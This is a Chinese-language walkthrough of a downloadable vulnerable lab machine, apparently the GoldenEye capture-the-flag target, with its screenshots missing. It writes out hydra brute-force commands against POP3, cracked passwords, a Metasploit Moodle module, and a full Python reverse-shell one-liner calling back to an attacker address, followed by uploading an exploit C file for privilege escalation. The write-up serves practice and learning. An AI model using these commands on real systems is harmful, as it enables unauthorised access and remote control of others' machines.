仅供个人娱乐
靶机信息
下载地址:https://pan.baidu.com/s/1dzs_qx-YwYHk-vanbUeIxQ
一、主机扫描

二、信息收集









三、漏洞的查找和利用


boris InvincibleHack3r
进行登录
转化为小写登录成功



pop3 为55007端口
爆破
hydra -L 2.txt -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.130 -s 55007


boris secret1!
Boris secret1!
Natalya bird
登录pop3服务
natalya账户


boris账户


发现信息

或者使用邮箱


xenia RCP90rulez!
修改host 文件

windows出现问题(别尝试windows 有毒 慎重) 选择kali

修改hosts文件,访问severnaya-station.com/gnocertdir,是一个moodle学习管理系统


xenia RCP90rulez! 登录

信息收集


得到用户名:“doak”,我们继续爆破试试
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.130 -s 55007

登录邮箱查看信息

USER dr_doak
PASS 4England!





得到密文:“eFdpbnRlcjE5OTV4IQ==”

密码为:“xWinter1995x!” 帐号为默认的 admin
登录 进行信息收集



use exploit/multi/http/moodle_cmd_exec

运行失败,百度参考大佬
设置路径为:Plugins— Text editors — TinyMCE HTML editor 在下拉选框中选择 “PSpellShell”




删除hosts文件内容 同样失败

搞不定 百度显示个人版本太高
第二种方法

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

反弹shell
python -c 'import pty; pty.spawn("/bin/bash")'
信息收集


ssh上传
开启:/etc/init.d/ssh start
scp root@192.168.56.129:/root/1.c /tmp/

编译 对c文件进行编译,有gcc,cc,cang,文件默认是gcc

失败

修改1.c文件 重名2.c


scp root@192.168.56.129:/root/2.c /tmp/

